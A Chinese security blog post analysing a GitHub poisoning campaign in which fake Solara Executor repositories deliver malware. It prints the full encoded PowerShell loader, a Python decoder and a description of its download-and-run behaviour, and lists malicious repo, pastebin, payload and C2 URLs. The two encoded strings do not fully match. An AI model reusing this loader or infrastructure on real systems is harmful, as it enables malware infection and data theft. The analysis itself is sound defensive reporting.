Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >GitHub 上的投毒攻击事件剖析

GitHub 上的投毒攻击事件剖析

作者头像
Khan安全团队
发布于 2025-04-07 02:38:22
发布于 2025-04-07 02:38:22
6700
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

Solara Executor 是一款针对 Roblox 平台的脚本执行器,宣称具备卓越的脚本执行能力、出色的性能以及简洁直观的操作界面,还强调与 Roblox 的最新版本完全兼容,为游戏玩家、开发人员和模组制作者提供高安全性与便捷性。然而,这款软件却被不法分子利用,在 GitHub 上实施投毒攻击。

攻击链路概述

本次攻击的具体流程涉及多个环节,从在 GitHub 上传播恶意文件,到执行恶意脚本,再到下载更多恶意程序并进行数据外联,形成了一条完整的恶意攻击链路。

GitHub 账号分析

多个涉及此次攻击的 GitHub 账号均于 2025 年 3 月 13 - 14 日新建,账号信息如下:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://github.com/averhrs/SolaraExecutor-V3
https://github.com/provvsh/SolaraExecutor-V3
https://github.com/EightS09/SolaraExecutor-V3
https://github.com/verrtsh/SolaraExecutor-V3

这些账号创建时间集中且均为公开仓库,首次创建的项目均为 SolaraExecutor-V3,账号创建时间的异常集中暗示其存在恶意目的的可能性。

图片包含 图形用户界面

AI 生成的内容可能不正确。
图片包含 图形用户界面 AI 生成的内容可能不正确。
图形用户界面

AI 生成的内容可能不正确。
图形用户界面 AI 生成的内容可能不正确。
图片包含 图形用户界面

AI 生成的内容可能不正确。
图片包含 图形用户界面 AI 生成的内容可能不正确。

攻击详情

用户从 GitHub 上下载并运行 Solara V3.exe 后,会触发一段恶意的 PowerShell 脚本执行。该脚本通过 Loader.exe 进程调用 PowerShell 执行,具体执行命令为:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AbQB1AEQAVQB1AGUATABOACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+

对这段经过编码的 PowerShell 命令进行解密(使用 Python 代码实现):

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
import base64
encoded_command = "PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AbQB1AEQAVQB1AGUATABOACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGkAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4A"
decoded_bytes = base64.b64decode(encoded_command)
decoded_command = decoded_bytes.decode('utf-16')
print(decoded_command)

解密后的脚本会执行以下恶意操作:首先创建一个System.Net.WebClient 对象,从指定的 URL(https://pastebin.com/raw/muDUeLN )下载文本内容。接着,将下载的文本按换行符分割得到多个链接。然后生成一个随机文件名,通过循环遍历分割得到的链接,把每个链接指向的文件下载到用户应用数据目录下,下载的文件名由随机文件名、序号和.exe 扩展名组成。

其中,从链接(https://github.com/1tthens1/PMI/raw/rets/heads/main/DEVM26.exe)下载的 DEVM26.exe 文件,在本地运行后会自动注入内存数据。

外联地址:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://menuedgarli.shop/api
https://featureccus.shop/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://htardwarehu.icu/api
https://1cjlaspcorne.icu/api
https://bugildbett.top/api
https://latchclan.shop/api
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-04-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全攻防实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
供应链投毒预警 | 恶意NPM包利用Windows反向shell后门攻击开发者
本周(2024年02月19号),悬镜供应链安全情报中心在NPM官方仓库(https://npmjs.com)中发现多起NPM组件包投毒事件。攻击者利用包名错误拼写方式 (typo-squatting)在NPM仓库中连续发布9个不同版本的恶意包,试图通过仿冒合法组件(ts-patch-mongoose)来攻击潜在的NodeJS开发者。
OpenSCA社区
2024/02/29
3640
“寄生兽”(DarkHotel)针对中国外贸人士的最新攻击活动披露
腾讯御见威胁情报中心曾在2018年4月披露过"寄生兽"(DarkHotel)在2018年针对中国外贸企业高管的定向攻击活动。近期,我们再次检测到该攻击组织的最新攻击活动,依然针对跟半岛地区相关的外贸企业高管进行的攻击活动。
FB客服
2019/07/05
3.5K0
“寄生兽”(DarkHotel)针对中国外贸人士的最新攻击活动披露
制作chm格式木马病毒
CHM是英语“Compiled Help Manual”的简写,即“已编译的帮助文件”。CHM是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。
程序猿的栖息地
2022/04/29
5.8K2
制作chm格式木马病毒
网络罪犯并非儿戏:Roblox模组中隐藏的恶意软件
几十年来,投机的网络罪犯一直利用破解游戏或模组来向热情的游戏玩家传播恶意软件。随着威胁形势的发展,网络罪犯的策略也随之演变。
云云众生s
2025/01/27
1380
网络罪犯并非儿戏:Roblox模组中隐藏的恶意软件
JAVA代码审计之java反序列化
Serialization(序列化):将java对象以一连串的字节保存在磁盘文件中的过程,也可以说是保存java对象状态的过程。
FB客服
2022/11/14
4140
构建自定义的Empire模块来绕过amsi
今天逛推特,看到了某师傅通过自定义Empire模块来绕过amsi,地址如下:https://twitter.com/_vinnybod/status/1386442836417994752
鸿鹄实验室
2021/04/29
7610
构建自定义的Empire模块来绕过amsi
Turla PowerShell攻击手法学习
Turla,也被称为 Snake,是一个臭名昭著的间谍组织,以其复杂的恶意软件而闻名。Turla 至少从 2008 年就开始运作,当时它成功攻击了美国军队。最近,它参与了对德国外交部和法国军队的重大攻击事件。
黑白天安全
2021/12/05
8480
Turla PowerShell攻击手法学习
DNS劫持欺骗病毒“自杀”
某天忽然发现公司上百台机器中了变种的挖矿病毒DTLMiner,该病毒传播方式有多种,主要利用永恒之蓝漏洞、弱口令、mimikatz抓取域密码,数据库弱口令等方式传播,中毒后的机器会沦为挖矿机。
FB客服
2019/05/09
2.6K0
DNS劫持欺骗病毒“自杀”
反弹shell的学习总结 - Part 1
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。
安全小王子
2020/07/31
9740
反弹shell的学习总结 - Part 1
WMI使用学习笔记
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/12/19
2.3K0
WMI使用学习笔记
社工工具包 SEToolkit
社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一种手段,社会工程学的应用领域非常之广泛,而很多黑客也会将社工运用到渗透的方方面面,社工也被称为没有技术,却比技术更强大的渗透方式,正所谓 “攻城为下,攻心为上” 这句话用在社工上面是最恰当不过的啦。
王瑞MVP
2022/12/28
1.4K0
社工工具包 SEToolkit
DLL攻击漫谈
动态链接库(DLL)的方式以及Windows API指示使用它们的方式都可以用作任意代码执行的接口,并协助恶意行为者实现其目标。
黑白天安全
2020/11/03
1.3K0
DLL攻击漫谈
RomCom 攻击者使用投毒的应用程序攻击乌克兰与英国
被称为 RomCom 的攻击者正在利用 SolarWinds、KeePass 与 PDF Technologies 等公司的软件作为诱饵,开展一系列的攻击行动。研究人员发现攻击者通过虚假软件针对乌克兰军事机构发起攻击,并且投递 RomComRAT 远控木马。 RomCom 在攻击行动中仿冒了 SolarWinds Network Performance Monitor、KeePass Open-Source Password Manager 与 PDF Reader Pro 这几款软件。 根据恶意网站的服务
FB客服
2023/03/29
4920
RomCom 攻击者使用投毒的应用程序攻击乌克兰与英国
无文件挖矿应急响应处置报告
由于运维过程中可能存在违规操作、过失操作或者防护能力不足导致被恶意操作使得主机遭受挖矿程序的侵害,该挖矿程序会下载恶意程序至WMI中,实现无文件挖矿和内网渗透,并下载DDOS攻击程序和通过任务计划每隔20分钟自动生成版本校验恶意程序。
FB客服
2019/07/09
3.3K0
无文件挖矿应急响应处置报告
Powershell绕过执行及脚本混淆
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。
信安之路
2018/08/08
2.9K0
Powershell绕过执行及脚本混淆
浅析某针对乌克兰国防和经济部门的大规模钓鱼事件
石楠花开前,小河西村检测到多起针对乌克兰国防和经济部门的攻击事件。在短暂的分析之后,我们惊讶地发现这是一起持续且大规模的网络间谍活动,乌克兰是主要的受害国。
FB客服
2019/05/14
1.2K0
浅析某针对乌克兰国防和经济部门的大规模钓鱼事件
渗透技巧——从github下载文件的多种方法
已知exe文件:https://github.com/3gstudent/test/raw/master/putty.exe
用户1467662
2019/07/31
3.7K0
渗透技巧——从github下载文件的多种方法
【技术分享】Android渗透测试
kali nethunter 是在已有的 rom上对内核进行修改而定制的一个系统,他通过 chroot 来在安卓设备中运行 kali。故在安装 kali nethunter前你得先有一个被支持的rom.官方支持的设备和rom列表: https://github.com/offensive-security/kali-nethunter/wiki 。这里我用的是 nexus4 ,其他设备的流程应该大概差不多。具体流程如下:
知识与交流
2023/03/25
1.1K0
【技术分享】Android渗透测试
暗云III v3.0等多个病毒家族结伴来袭实战分析
根据C:/Windows/System32/b.txt产生的老的连接状态日志发现有大量外发扫描1433端口判断可能是通过SQL Server弱密码进来的。
FB客服
2019/03/08
2.5K0
暗云III v3.0等多个病毒家族结伴来袭实战分析
Neurevt 木马与窃密程序相结合,针对墨西哥企业
恶意行为从混淆的恶意 PowerShell 命令开始,该命令会下载一个 Neurevt 家族的恶意文件。
FB客服
2021/09/16
5370
推荐阅读
相关推荐
供应链投毒预警 | 恶意NPM包利用Windows反向shell后门攻击开发者
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验